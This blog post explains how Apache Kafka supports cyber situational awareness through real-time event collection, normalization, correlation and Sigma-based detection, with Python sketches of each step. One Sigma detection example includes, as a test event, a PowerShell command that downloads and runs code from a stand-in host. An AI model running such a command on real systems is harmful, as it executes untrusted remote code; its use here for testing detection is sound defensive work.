Apache Kafka became the de facto standard for processing data in motion across enterprises and industries. Cybersecurity is a key success factor across all use cases. Kafka is not just used as a backbone and source of truth for data. It also monitors, correlates, and proactively acts on events from various real-time and batch data sources to detect anomalies and respond to incidents. This blog series explores use cases and architectures for Kafka in the cybersecurity space, including situational awareness, threat intelligence, forensics, air-gapped and zero trust environments, and SIEM / SOAR modernization. This post is part two: Cyber Situational Awareness.

Blog series: Apache Kafka for Cybersecurity

This blog series explores why security features such as RBAC, encryption, and audit logs are only the foundation of a secure event streaming infrastructure. Learn about use cases, architectures, and reference deployments for Kafka in the cybersecurity space:

- Part 1: Data in Motion as cybersecurity backbone

- Part 2 (THIS POST): Situational awareness

- Part 3: Threat intelligence

- Part 4: Forensics

- Part 5: Air-gapped and zero trust environments

- Part 6: SIEM / SOAR modernization

Subscribe to my newsletter to get updates immediately after publication. I will also update the list above with direct links to the posts of this series as soon as they are published.



The Four Stages of an Adaptive Security Architecture

Gartner defines four stages of adaptive security architecture to prevent, detect, respond and predict cybersecurity incidents:

Continuous monitoring and analytics are the keys to building a successful proactive cybersecurity solution. It should be obvious: Continuous monitoring and analytics require a scalable real-time infrastructure. Batch processes on data at rest, i.e., data stored in a database, data warehouse, or data lake, cannot monitor events continuously in real-time.

Situational Awareness



“Situation awareness is the perception of the elements in the environment within a volume of time and space, the comprehension of their meaning, and the projection of their status in the near future.” Source: Endsley, M. R. SAGAT: A methodology for the measurement of situation awareness (NOR DOC 87-83). Hawthorne, CA: Northrop Corp.

Here is a theoretical view on situational awareness and the relation between humans and computers:



Cyber Situational Awareness = Continuous Real-Time Analytics

Cyber Situational Awareness is the subset of all situation awareness necessary to support taking action in cyber. It is the mandatory key concept to defend against cybersecurity attacks.

Automation and analytics in real-time are key characteristics:

No matter how good the threat detection algorithms and security platforms are, prevention or at least detection of attacks needs to happen in real-time. Predictions with cutting-edge machine learning models do not help if they are executed in a batch process overnight.

Situational awareness covers various levels beyond the raw network events. It includes all environments, including application data, logs, people, and processes.

I covered the challenges in the first post of this blog series. In summary, cybersecurity experts’ key challenge is finding the needle(s) in the haystack. The haystack is typically huge, i.e., massive volumes of data. Often, it is not just one haystack but many. Hence, a key task is to reduce false positives.

Situational awareness is not just about viewing the dashboard but about understanding what’s going on in real-time. Situational awareness finds the relevant data to create critical (rare) alerts automatically. No human can handle the huge volumes of data.

Situational Awareness in Motion with Kafka

The Kafka ecosystem provides the components to correlate massive volumes of data in real-time, provide situational awareness across the enterprise, and find all needles in the haystack:

Event streaming powered by the Kafka ecosystem delivers contextually rich data to reduce false positives:

- Collect all events from data sources with Kafka Connect

- Filter event streams with Kafka Connect’s Single Message Transforms (SMT) so that only relevant data gets into the Kafka topic

- Empower real-time streaming applications with Kafka Streams or ksqlDB to correlate events across various source interfaces

- Forward priority events to other systems such as the SIEM/SOAR with Kafka Connect or any other Kafka client (Java, C, C++, .NET, Go, JavaScript, HTTP via REST Proxy, etc.)
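The four steps above can be sketched in plain Python without a broker. This is only an illustration of the flow, not Kafka code: a list stands in for a topic, and the event fields (`source`, `host`, `type`), the `is_relevant` filter, and the "two distinct sources per host" correlation rule are hypothetical choices made for this example. In a real deployment, Kafka Connect, SMTs, and Kafka Streams or ksqlDB would take over these roles.

```python
from collections import defaultdict

# Hypothetical raw events as they might arrive from different sources.
RAW_EVENTS = [
    {"source": "firewall", "host": "10.0.0.5", "type": "denied_connection"},
    {"source": "heartbeat", "host": "10.0.0.5", "type": "ping"},
    {"source": "antivirus", "host": "10.0.0.5", "type": "malware_detected"},
    {"source": "firewall", "host": "10.0.0.9", "type": "denied_connection"},
    {"source": "heartbeat", "host": "10.0.0.9", "type": "ping"},
]


def is_relevant(event):
    """Filter step: drop noise before it reaches the 'topic'."""
    return event["source"] != "heartbeat"


def correlate(events):
    """Correlation step: flag hosts reported by two or more distinct sources."""
    sources_by_host = defaultdict(set)
    for event in events:
        sources_by_host[event["host"]].add(event["source"])
    return [
        {"host": host, "sources": sorted(sources), "priority": "high"}
        for host, sources in sources_by_host.items()
        if len(sources) >= 2
    ]


def run_pipeline(raw_events):
    """Collect and filter, then correlate; the result is what gets forwarded."""
    topic = [event for event in raw_events if is_relevant(event)]
    return correlate(topic)


alerts = run_pipeline(RAW_EVENTS)
print(alerts)
```

Only the host that shows up in both the firewall and the antivirus stream is forwarded as a priority event. The single firewall hit on the other host stays below the threshold, which is the kind of context that helps reduce false positives.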

Example: Situational Awareness with Kafka and SIEM/SOAR



SIEM/SOAR modernization is its own blog post of this series. But the following picture depicts how Kafka enables true decoupling between applications in a domain-driven design (DDD):

A traditional data store like a data lake is NOT the right spot for implementing situational awareness as it is data at rest. Data at rest is not a bad thing. Several use cases such as reporting (business intelligence), analytics (batch processing), and model training (machine learning) require this approach. For situational awareness, however, real-time beats slow data. Hence, event streaming with the de facto standard Apache Kafka is the right fit.

Event streaming and data lake technologies are complementary, not competitive. The blog post “Serverless Kafka in a Cloud-native Data Lake Architecture” explores this discussion in much more detail by looking at AWS’ lake house strategy and its relation to event streaming.

The Data

Situational awareness requires data. A lot of data. Across various interfaces and communication paradigms. A few examples:

- Text files (TXT)

- Firewalls and network devices

- Binary files

- Antivirus

- Databases

- Access

- APIs

- Audit logs

- Network flows

- Intrusion detection

- Syslog

- And many more…

Let’s look at the three steps of implementing situational awareness: Data producers, data normalization and enrichment, and data consumers.



Data Producers

Data comes from various sources. This includes real-time systems, batch systems, files, and much more. The data includes high-volume logs (including NetFlow and indirectly PCAP) and low-volume transactional events:



Data Normalization and Enrichment

The key success factor to implementing situational awareness is data correlation in real-time at scale. This includes data normalization and processing such as filter, aggregate, transform, etc.:

With Kafka, end-to-end data integration and continuous stream processing are possible with a single scalable and reliable platform. This is very different from the traditional MQ/ETL/ESB approach. Data governance concepts for enforcing data structures and ensuring data quality are crucial on the client-side and server-side. For this reason, the Schema Registry is a mandatory component in most Kafka architectures.
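To make normalization, structure enforcement, and enrichment more tangible, here is a minimal Python sketch. It does not use the Schema Registry or any Kafka API. The common schema, the raw record layouts (`ts`/`src`/`action` for a firewall, `time`/`ip`/`msg_type` for syslog), and the asset lookup table are all assumptions made up for this example.

```python
from datetime import datetime, timezone

# Hypothetical target schema: field name -> required Python type.
COMMON_SCHEMA = {"timestamp": str, "src_ip": str, "event_type": str, "source": str}


def normalize_firewall(raw):
    """Map a (hypothetical) firewall record onto the common schema."""
    return {
        "timestamp": datetime.fromtimestamp(raw["ts"], tz=timezone.utc).isoformat(),
        "src_ip": raw["src"],
        "event_type": raw["action"].lower(),
        "source": "firewall",
    }


def normalize_syslog(raw):
    """Map a (hypothetical) pre-parsed syslog record onto the common schema."""
    return {
        "timestamp": raw["time"],
        "src_ip": raw["ip"],
        "event_type": raw["msg_type"].lower(),
        "source": "syslog",
    }


def validate(event, schema=COMMON_SCHEMA):
    """Reject events with missing, extra, or wrongly typed fields."""
    if set(event) != set(schema):
        raise ValueError(f"unexpected fields: {sorted(set(event) ^ set(schema))}")
    for field, expected_type in schema.items():
        if not isinstance(event[field], expected_type):
            raise ValueError(f"{field} must be {expected_type.__name__}")
    return event


def enrich(event, asset_db):
    """Add context from a lookup table; unknown hosts are marked as such."""
    return {**event, "asset_owner": asset_db.get(event["src_ip"], "unknown")}


ASSET_DB = {"10.0.0.5": "finance"}  # hypothetical asset inventory
fw = enrich(
    validate(normalize_firewall({"ts": 0, "src": "10.0.0.5", "action": "DENY"})),
    ASSET_DB,
)
sl = enrich(
    validate(normalize_syslog({"time": "2021-01-01T00:00:00+00:00",
                               "ip": "10.0.0.9", "msg_type": "AUTH_FAIL"})),
    ASSET_DB,
)
print(fw)
print(sl)
```

Once both sources share one structure, downstream correlation logic only has to deal with a single event shape. Validating before enrichment mirrors the idea of rejecting malformed data at the edge instead of letting it reach every consumer.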





Data Consumers

A single system cannot implement cyber situational awareness. Different questions, challenges, and problems require different tools. Hence, most Kafka deployments run various Kafka consumers using different communication paradigms and different speeds:

Some workloads require data correlation in real-time to detect anomalies or even prevent threats as soon as possible. Kafka-native applications come into play. The client technology is flexible depending on the infrastructure, use case, and developer experience. Java, C, C++, Go are some coding options. Kafka Streams or ksqlDB provide out-of-the-box stream processing capabilities. The latter is the recommended option as it provides many features built-in such as sliding windows to build stateful aggregations.
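The idea of a stateful aggregation over a sliding window can be illustrated in a few lines of Python. This is a conceptual sketch and not the Kafka Streams or ksqlDB API: the class name `SlidingWindowCounter`, the failed-login scenario, and the threshold are hypothetical, and the sketch assumes that events arrive in timestamp order per key.

```python
from collections import defaultdict, deque


class SlidingWindowCounter:
    """Counts events per key over the last `window_seconds` of event time."""

    def __init__(self, window_seconds, threshold):
        self.window_seconds = window_seconds
        self.threshold = threshold
        self._timestamps = defaultdict(deque)  # key -> timestamps inside the window

    def add(self, key, timestamp):
        """Record one event; return True if the key reaches the threshold."""
        window = self._timestamps[key]
        window.append(timestamp)
        # Evict timestamps that fell out of the window so state stays bounded.
        while window and window[0] <= timestamp - self.window_seconds:
            window.popleft()
        return len(window) >= self.threshold


# Hypothetical stream of (user, event_time_in_seconds) failed-login events.
failed_logins = [("alice", 0), ("alice", 20), ("bob", 30), ("alice", 50), ("alice", 200)]

counter = SlidingWindowCounter(window_seconds=60, threshold=3)
alerts = [(user, ts) for user, ts in failed_logins if counter.add(user, ts)]
print(alerts)
```

The per-key state is what makes this aggregation stateful. A stream processing framework additionally takes care of persisting and partitioning that state and of handling out-of-order events, which this sketch ignores.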

A SIEM, SOAR, or data lake is complementary to run other analytics use cases for threat detection, intrusion detection, or reporting. The SIEM/SOAR modernization blog post of this series explores this combination in more detail.

Situational Awareness with Kafka and Sigma

Let’s take a look at a concrete example. A few of my colleagues built a great implementation for cyber situational awareness: Confluent Sigma. So, what is it?

Sigma – An Open Signature Format for Cyber Detection

Sigma is a generic and open signature format that allows you to describe relevant log events straightforwardly. The rule format is very flexible, easy to write, and applicable to any log file. The main purpose of this project is to provide a structured form in which cybersecurity engineers can describe their detection methods and make them shareable with others, either within the company or with the community.

A few characteristics that describe Sigma:

- Open-source framework

- A domain-specific language (DSL)

- Specify patterns in cyber data

- Sigma is for log files what Snort is for network traffic, and YARA is for files

Sigma provides integration with various tools such as ArcSight, QRadar, Splunk, Elasticsearch, Sumo Logic, and many more. A huge benefit is that you can specify a Sigma signature once and then use it with all the mentioned tools. However, as you learned in this post, many scenarios for cyber situational awareness require real-time data correlation at scale. That’s where Kafka comes into play.
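To give a feeling for how a signature describes a log event, here is a small Python sketch that evaluates a Sigma-style rule against events. It is neither the official Sigma tooling nor the Confluent Sigma implementation. The rule itself is invented for illustration and written as a Python dict instead of YAML. The evaluator supports only a small subset of the format: one named selection referenced directly by `condition`, the `contains`, `startswith`, and `endswith` field modifiers, list values as alternatives, and case-insensitive string comparison.

```python
# Illustrative rule (not taken from the Sigma rule repository).
RULE = {
    "title": "Suspicious PowerShell download (illustrative)",
    "logsource": {"category": "process_creation"},
    "detection": {
        "selection": {
            "Image|endswith": "\\powershell.exe",
            "CommandLine|contains": ["DownloadString", "DownloadFile"],
        },
        "condition": "selection",
    },
}

# Supported comparison modes; None means plain equality.
MODIFIERS = {
    None: lambda actual, expected: actual == expected,
    "contains": lambda actual, expected: expected in actual,
    "startswith": lambda actual, expected: actual.startswith(expected),
    "endswith": lambda actual, expected: actual.endswith(expected),
}


def field_matches(event, key, expected):
    """Check one 'field|modifier' entry; list values are alternatives (OR)."""
    name, _, modifier = key.partition("|")
    if name not in event:
        return False
    compare = MODIFIERS[modifier or None]
    actual = str(event[name]).lower()
    candidates = expected if isinstance(expected, list) else [expected]
    return any(compare(actual, str(candidate).lower()) for candidate in candidates)


def matches(rule, event):
    """All fields of the selection named by `condition` must match (AND)."""
    detection = rule["detection"]
    selection = detection[detection["condition"]]
    return all(field_matches(event, key, value) for key, value in selection.items())


suspicious = {
    "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "CommandLine": "powershell -c IEX (New-Object Net.WebClient)"
                   ".DownloadString('http://example.test/a')",
}
benign = {"Image": "C:\\Windows\\explorer.exe", "CommandLine": "explorer.exe"}

print(matches(RULE, suspicious), matches(RULE, benign))
```

Because the rule is plain data, the same signature can be handed to different backends. A stream processing application can evaluate it per event as shown here, while another tool can translate it into its own query language.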



Confluent Sigma



Confluent Sigma is an open-source project implemented by a few of my colleagues. Kudos to William LaForest, and a few more. The project integrates Sigma into Kafka by embedding the Sigma rules into stream processing applications powered by Kafka Streams and ksqlDB:



Situational Awareness with Zeek, Kafka Streams, KSQL, and Sigma

Here is a concrete event streaming architecture for situational awareness:

A few notes on the above picture:

- Sigma defines the signature rules

- Zeek provides incoming IDS log events at high volume in real-time

- Confluent Platform processes and correlates the data in real-time

- The stream processing part built with Kafka Streams and ksqlDB includes stateless functions such as filtering and stateful functions such as aggregations

- The calculated detections get ingested into a Zeek dashboard and other Kafka consumers



Here is an example of a Sigma Rule for windowing and aggregation of logs:

The Kafka Streams topology of the example looks like this:

My colleagues will do a webinar to demonstrate Confluent Sigma in more detail, including a live demo. I will share the on-demand link here as soon as it is available. Some demo code is available on GitHub.

Cisco ThousandEyes Endpoint Agents

Let’s take a look at a concrete Kafka-native example to implement situational awareness at scale in real-time. Cisco ThousandEyes Endpoint Agents is a monitoring tool to gain visibility from any employee to any application over any network. It provides proactive and real-time monitoring of application experience and network connectivity.

The platform leverages the whole Kafka ecosystem for data integration and stream processing:

- Kafka Streams for stateful network tests

- Interactive queries for fetching results

- Kafka Streams for windowed aggregations for alerting use cases

- Kafka Connect for integration with backend systems such as MySQL, Elastic, MongoDB

ThousandEyes’ tech blog is a great resource to understand the implementation in more detail.

Kafka is a Key Piece to Implement Cyber Situational Awareness

Cyber situational awareness is mandatory to defend against cybersecurity attacks. A successful implementation requires continuous real-time analytics at scale. This is why the Kafka ecosystem is a perfect fit.

The Confluent Sigma implementation shows how to build a flexible but scalable and reliable architecture for realizing situational awareness. Event streaming is a key piece of the puzzle.

However, it is not a replacement for other tools such as Zeek for network analysis or Splunk as SIEM. Instead, event streaming complements these technologies and provides a central nervous system that connects and truly decouples these other systems. Additionally, the Kafka ecosystem provides the right tools for real-time stream processing.

How did you implement cyber situational awareness? Is it already real-time and scalable? What technologies and architectures do you use? Let’s connect on LinkedIn and discuss it! Stay informed about new blog posts by subscribing to my newsletter.